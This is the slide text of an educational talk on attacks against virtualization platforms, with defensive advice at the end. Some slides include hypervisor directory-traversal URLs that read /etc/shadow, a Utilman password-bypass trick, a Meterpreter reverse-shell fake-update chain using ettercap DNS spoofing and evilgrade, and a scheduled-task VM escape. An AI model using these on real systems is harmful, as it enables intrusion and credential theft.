This document provides an overview of virtualization security topics. It discusses various virtualization threats including guest VM attacks, hypervisor attacks, and management API attacks. Specific vulnerabilities are also mentioned, such as directory traversal issues and buffer overflows in hypervisor components like the virtual floppy disk controller. Attack methods like privilege escalation, denial of service, and taking control of the hypervisor are covered at a high level.

2. # WHO AM I
Senior Security Engineer
Penetration Testing
Incident Response

3. DISCLAIMERS
“This presentation do not encourage people to hack.”
(For educational purpose only)
AND
“Presentation do not cover all parts of virtualization Technology area.”
(It is rearranged from my thesis research literature review)

4. TOPIC
• Virtualization and hypervisor
• Virtualization threats and issues
• Vulnerability Statistic of widely used Hypervisors
• Guest VM Attack
• Virtualization environment network Attack
• Hypervisor Attack
• Hypervisor management and API Attack
• Host Attack from VM
• Docker Breakout by shocker
• Use Virtualization as Attack Tools
• Security for Virtualization

6. Virtualization

7. VIRTUALIZATION
Cloud
googleiCloud

8. VIRTUALIZATION
Cloud
googleiCloud

9. VIRTUALIZATION

10. VIRTUALIZATION
vShpere Client
vCenter
XenCenter
Virt-manager

11. Hypervisor

12. HYPERVISOR

13. HYPERVISOR

14. VM
VM
VM VM
VMVMVMVM VM
HYPERVISOR

15. VM
VM
VM VM
VMVMVMVM VM
HYPERVISOR
VMware
workstation

17. HYPERVISORVS DOCKER
**Application containers

18. Virtualization Threats

20. Vulnerability Statistic

21. CVE-DETAIL
cvedetails.com

22. 10
7
11
8
54
58 58
45
cvedetails.com
Bare-metal Hypervisor vulnerability
2008 2009 2010 2011 2012 2013 2014 2015

23. 0 20 40 60 80 100 120 140 160 180 200
DoS
Gain Privileges
Overflow
Code Execution
Gain Information
Memory Corruption
Bypass something
Directory Traversal
XSS
Bare-metal Hypervisor vulnerability 2008-2015
cvedetails.com
52%
15%
12%
7%
6.5%
4.5%
2%
1%
0.5%

24. IS VIRTUALIZATION THREAT DIFFERENCE
FORM TRADITIONAL ENVIRONMENT ?

25. OS : Linux , Windows, Solaris
Application : Web, WebService, Mail , FTP, DB
Hardware : CPU , Memory, Storage, NIC, Network
Traditional
Operating System

26. OS : Linux , Windows, Solaris
Application : Web, WebService, Mail , FTP, DB
Hardware : CPU , Memory, Storage, NIC, Network
XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, Arp Poisoning
Operating System
Traditional

27. OS : Linux , Windows, Solaris
Application : Web, WebService, Mail , FTP
Hypervisor components : Kennel , Lib, API, Network
Hardware : CPU , Memory, Storage, NIC, Network
Virtualization

28. OS : Linux , Windows, Solaris
Application : Web, WebService, Mail , FTP, DB
Hypervisor components : Kennel , Lib, API, Network
Hardware : CPU , Memory, Storage, NIC, Network
XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, Arp Poisoning
Virtualization
Additional
Attack Surface

29. GENERALSECURITY ISSUEFOR VIRTUALIZATION
• Information Leakage.
• Unauthorized Access
• Intentionally OR Unintentionally
• USERS OR Administrators
• Data Remain In Storage
• Data Ownership.
• Data Migration when end of service.
• Multi tenancy
• Share resource
• Use VM to commit fraud or Crime
• Laws and regulations

30. VIRTUALIZATION TECHNICAL SECURITY ISSUE

31. GUEST VM ATTACK
• Traditional Attacks According To Services
• Guest VM attack other Guest VMs (Same network segment)
• Guest VM attack other Guest VMs on the same Hypervisor (VM hyper Jumping)
• Cross-VM Attack (Side Channel Attack)
• Guest Stealing
• Guest Copy

32. TRADITIONAL ATTACK
Hypervisor
Guest VM1 Guest VM2

33. VM ATTACKS OTHERS VM
Hypervisor
Guest VM1 Guest VM2

34. VM HYPER JUMPING
Hypervisor
Guest VM1 Guest VM2

35. CROSS-VMATTACK (SIDECHANNEL)
Hypervisor
Guest VM1 Guest VM2
Time or
Computational Power

36. GUEST STEALING
https://192.168.254.158:8333/sdk/../../../../../../root/vmpath/xxx.vmdk
Hypervisor
Management
API
file

37. GUEST STEALING
https://192.168.254.158:8333/sdk/../../../../../../root/vmpath/xxx.vmdk
Hypervisor
Management
API
file

38. GUEST STEALING: VASTO

39. GUEST STEALING: VASTO

40. GUEST COPY (Authorized)
- Passwords
- OS
- Mail
- Cookies
- Browser history
- Sensitive Data
- Databases
- Configurations
- Source codes
- Software licenses
- Many more...

41. GUEST COPY
Copy them
(Unauthorized)

42. IF ( VM ==win7 or XP)

43. IF ( VM ==2008 or 2012)
How about password ?

44. How about password ?
Ans: Reset it !!!
IF ( VM ==2008 or 2012)

45. Insert CD to make tricky password reset via repair option

48. Copy cmd.exe to be Utilman.exe
And reboot

49. Press Windows Key + U

53. Bravo !!!

54. ps :http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html
Or add another account as administrator and hashdump
And crack it by JTR

55. IF ( VM ==Unix) THEN singel_mode ();

56. Forensic tools to access data
VMDK

57. Forensic tools to access data
Snapshot

58. NETWORK ATTACK
• Traditional Attacks According To Services
• vSwitch Attack
• Sniffing
• Scanning
• Mitm

59. • OPEN VSWITCH CVE-2012-3449 INSECURE DIRECTORY PERMISSIONS VULNERABILITY
• CITRIX XENSERVER VSWITCH CONTROLLER VERSION 6.0.2.
- vSwitch Attack

60. - SNIFF
L Not much sensitive inmodern VM/Hypervisor

61. - SCAN

62. • Directory Traversal
• Brute Force Attack
• Auxiliary/Scanner/Vmware/Vmware_http_login
• Burp Suite Intruder
• Response Splitting
MANAGEMENT API

63. CVE-2009-3733 :
ESXi Server Directory Traversal Vulnerability
• Vmware Esxi 3.5 Or Earlier
• Fail To Sufficiently Sanitize User-supplied Input Data
• Exploiting The Issue May Allow An Attacker To Obtain Sensitive Information
From The Host Operating System

64. Hypervisor
Management
API
System
file
CVE-2009-3733 :
ESXi Server Directory Traversal Vulnerability

65. https://192.168.254.158:8333/sdk/../../../../../../etc/shadow
Hypervisor
Management
API
System
file
CVE-2009-3733 :
ESXi Server Directory Traversal Vulnerability

66. CVE-2009-3733 :
ESXi Server Directory Traversal Vulnerability

67. ESX root password
Crack it withJTR !!!

68. BRUTE FORCE ATTACK
By Metasploit VMware Auxiliary Modules

69. BRUTE FORCE ATTACK
By Burp Suite Intruder

70. NO-CVE : HTTP RESPONSE SPLITTING

71. NO-CVE : HTTP RESPONSE SPLITTING

73. MANAGEMENT ENVIRONMENT ATTACK
• Hooking
• MiTM
• Fake Update
• Vmware-vilurker
• Evilgrade

74. HOOKING

75. MITM
Hypervisor
Management SoftwareAttackerHypervisor

76. MITM Whichpicture show we are under MiTM attack ???

77. MITM
We never know !!!!

78. MITM Whichpicture show we are under MiTM attack ???

79. MITM
We never know again!!!!

80. MITM

81. MITM : vSphere Client

82. MITM : XenCenter

83. Admin
FAKE MANAGEMENTSOFTWAREUPDATE
Concept
Internet
softwareupdate.vmware.comESXi

84. Admin
FAKE MANAGEMENTSOFTWAREUPDATE
Concept
Internet
softwareupdate.vmware.comESXi

85. Admin
FAKE MANAGEMENTSOFTWAREUPDATE
Concept
Internet
softwareupdate.vmware.comESXi
APR Spoofing
RougeDNS

86. Admin
FAKE MANAGEMENTSOFTWAREUPDATE
Concept
Internet
softwareupdate.vmware.comESXi
APR Spoofing
RougeDNS

87. FAKE MANAGEMENTSOFTWAREUPDATE
By vmware_vilurker
Credit:Watcharaphon Wongaphai

88. FAKE MANAGEMENTSOFTWAREUPDATE
By vmware_vilurker

89. FAKE MANAGEMENTSOFTWAREUPDATE
By vmware_vilurker

90. FAKE MANAGEMENTSOFTWAREUPDATE
By Evilgrade

91. FAKE MANAGEMENTSOFTWAREUPDATE
By Evilgrade

92. • create msfpayload > agent.exe (/usr/share/isr-evilgrade/agent/)
• create handler wait reverse connection
• add domain upgrade version into /etc/ettercap/etter.dns
• ettercap -tqm arp:remote /victim/ /dnsserver real/ -> p select dns_spoof
• run evilgrade
FAKE MANAGEMENTSOFTWAREUPDATE
By Evilgrade

93. root@localhost:~# msfvenom –p wondows/meterpreter/reverse_tcp LHOST=10.10.10.74 LPORT=8080 –f exe > /opt/agemt.exe
root@localhost:~# cp /agent.exe /usr/share/isr-evilgrade/agent/agent.exe
root@localhost:~# echo “softwareupdate.vmware.comA10.10.10.74" >> /usr/local/share/ettercap/etter.dns
root@localhost:~# sudo ettercap -tqm arp:remote // //
press p
root@localhost:~# dns_spoof
root@localhost:~# msfconsole
msf>use exploit multi/handler
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LHOST 10.10.10.74
msf>set LPORT 8080
msf> exploit
root@localhost :~# evilgrade
evilgrade >config vmware
evilgrade >start By Evilgrade

94. FAKE MANAGEMENTSOFTWAREUPDATE
Result

95. FAKE MANAGEMENTSOFTWAREUPDATE
Result

96. Admin
FAKE MANAGEMENTSOFTWAREUPDATE
Result
Internet
softwareupdate.vmware.comESXi
APR Spoofing
RougeDNS

97. HYPERVISOR ATTACK
• Compromised Hypervisor (Hyper-jacking)
• Take Full Control
• Running A Rogue Hypervisor On Top Of An Existing Hypervisor
• Install Hypervisor Root Kits
• Denial Of Service (Hypervisor Is A Great Single Point Of Failure)
• HyperCall Hooking/Attack

98. - DENIAL OF SERVICE : PSOD

99. - HYPER CALL HOOKING ATTACK
XEN i386
Paravirtualization

100. • EXAMPLE
• CVE-2013-4553: XEN DOMCTL_GETMEMLIST HYPERCALL IN XEN 3.4.X THROUGH 4.3.X
• CVE-2012-3495 : XEN HYPERCALLPHYSDEV_GET_FREE_PIRQ
• BUFFER OVERFLOW
• DENIAL OF SERVICE
• EXPLOIT CODE TO EXECUTE IN PRIVILEGE
- HYPER CALL HOOKING/ATTACK

101. CVE-2014-4947 AND 4948
LOCAL USERS DENY SERVICE AND OBTAIN POTENTIALLY SENSITIVE INFORMATION
• CVSS V2 Base Score: 10.0 (High)
• Citrix Xenserver 6.2 SP1 And Prior Versions
• A Local User On The Guest System can Trigger A Buffer Overflow In HVM
(Hardware Virtual MACHINE) Graphics Console Support
• Exploit On The Guest System Can Cause
• Denial Of Service Conditions
• Obtain Potentially Sensitive Information

102. Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resources

103. Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resources
AAAAAAAAAAAAAAAAAAAA...AAAAA

104. Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
ResourcesAAAAAAAAAAAAAAAAAAAA...AAAAA

105. Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resources
AAAAAAAAAAAAAAAAx00x00x00

106. Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resourcesxxxx

107. CVE-2015-3456 : VENOM
• Virtualized Environment Neglected Operations Manipulation
• Discovered by Jason Geffner, Crowdstrike senior security researcher
• The bug (Buffer Overflow) is in QEMU’s virtual floppy disk controller (FDC).
• This vulnerable fdc code is used in numerous virtualization platforms and appliances,
notably XEN, KVM, VIRTUALBOX,and the native QEMU client.
• Attackerneed to have administrative or root privileges in the guest operating system in
order to exploit VENOM
• The VENOM vulnerability has existed since 2004, when the virtual floppy disk controller
was first added to the QEMU codebase.
http://www.rapid7.com/resources/videos/venom-vulnerability-explained.jsp

108. Exploit to make Buffer overflow within the FDC,
break out of the VM

109. Exploit to make Buffer overflow within the FDC,
break out of the VM
Can access other VMs within that hypervisor

110. Exploit to make Buffer overflow within the FDC,
break out of the VM
Can access other VMs within that hypervisor
Can jump other VMs in other hypervisor

111. Exploit to make Buffer overflow within the FDC,
break out of the VM
Can access other VMs within that hypervisor
Can jump other VMs in other hypervisor
Can access to the underlying bare
metal systems hardware and use that
to see other systems on the
hypervisor's network

112. HOST ATTACK
VM ESCAPE
Resources
Hypervisor
Host
VM

113. HOST ATTACK
- USING PATHTRAVERSAL VULNERABILITY IN VMWARE'S SHARED FOLDERS
- CVE-2008-0923
- INSUFFICENT INPUT VALIDATION
VM ESCAPE
0xc20x2e0xc20x2e 0x2e0x2e ..
../../../../../../boot.ini

114. VM ESCAPE
modify VMFtp's source code to replace all occurrences of '+' with 'xc2' in an input pathname

115. VM ESCAPE
OR

116. VM ESCAPE
Modify task schedule as new jobto run metX.exe and put to back to /windows/tasks

117. Put create task to host
Generate meterpreter
VM ESCAPE

118. VM ESCAPE
Run handler and waituntil time to run Task
And Compromised

119. CVE-2012-0217
Virtualization Software Vulnerable To Privilege Escalation AttacksOn Intel64bits CPU
• Some 64-bit operating systems and virtualization software programs are vulnerable
to local privilege escalation attackswhen running on intel processors (cpus)
• Implemented The SYSRET Instruction In Their X86-64 Extension
• Attackerscould exploit the vulnerability to force intel cpus to return a general
protection fault in privileged mode
• Windows 7 And Windows Server 2008 R2, The 64-bit Versions Of Freebsd And Netbsd,
The Xen Virtualization Software, As Well As Red Hat Enterprise Linux And SUSE
Linux Enterprise Server, Which Include The Xen Hypervisor By Default
Architecture Vulnerability.

120. Architecture Vulnerability.
CVE-2012-0217
Virtualization Software Vulnerable To Privilege Escalation AttacksOn Intel64bits CPU
code

121. MALICIOUS SCRIPT IN HYPERVISOR

122. ROP
• Xen Hypervisor Utilizing Return-orientedProgramming (ROP).
• It modifies the data in the hypervisor that controls whether a VM is privileged
or not and thus can escalate the privilege of an unprivileged domain (DomU)

123. ROP

124. ROP

125. ROP

126. ROP Make Buffer
overflow

127. ROP
L Unfortunately, this technique need a lot of factor to make it possible intoday Hypervisor

128. FUZZING

129. USE VIRTUALIZATIONAS ATTACK TOOL
- Host Stealing (P2v host cloning)
VMware vCenter Converter Standalone

131. 10.200.1.10
Administrator
*************************

132. 10.200.1.100
root
*************************

133. 10.200.1.10010.200.1.10

134. - Compromised Host
- Get root/admin password
0

135. 10.200.1.10
Administrator
*************************
Victim

136. 10.200.1.100
root
*************************
ESX, Vmware
workstation
on
Hacker
Machine

137. 10.200.1.10010.200.1.10
Wait until finish

138. Don’t forget to Dump RAM, too!!!
P2V don’t copy current data inRAM from victim server
volatility
Meterpreter pmdump

139. Finish ....and Completely PWN
Have more time to get
- DB ConnectionStrings
- Sever Configurations
- Source code
- Crack more password
- Digmore sensitive files

140. But.. Noting easy in the real life

141. But.. Noting easy in the real life

142. DOCKER BREAKOUT
BY DOCKER SHOCKER
https://github.com/gabrtv/shocker

143. DOCKER BREAKOUT
BY DOCKER SHOCKER

144. DOCKER BREAKOUT
BY DOCKER SHOCKER

145. DOCKER BREAKOUT
BY DOCKER SHOCKER

147. Security for Virtualization

148. SECURITY FOR VIRTUALIZATION
• Contract , Law and regulation
• System Segmentation
• VLAN /SDN
• Dedicate Management Network
• Dedicated Storage Networks
• Protect All Virtual System File (Snapshot , VHDD, Configuration)
• Update Patches
• System Hardening
• Implement Security Monitoring And Detection Tools
• Security Assessment !!!!
• BCP / DRP

149. CONCLUSION
• Traditional Attack methodcan be use to attack Virtualization Technology
• Virtualization Technologyhas more attack surfaces
• Hypervisor is concerned as single point of failure
• Secure by design, Security Protection and hardening are important for
Virtualization Technology

150. Join to get security news update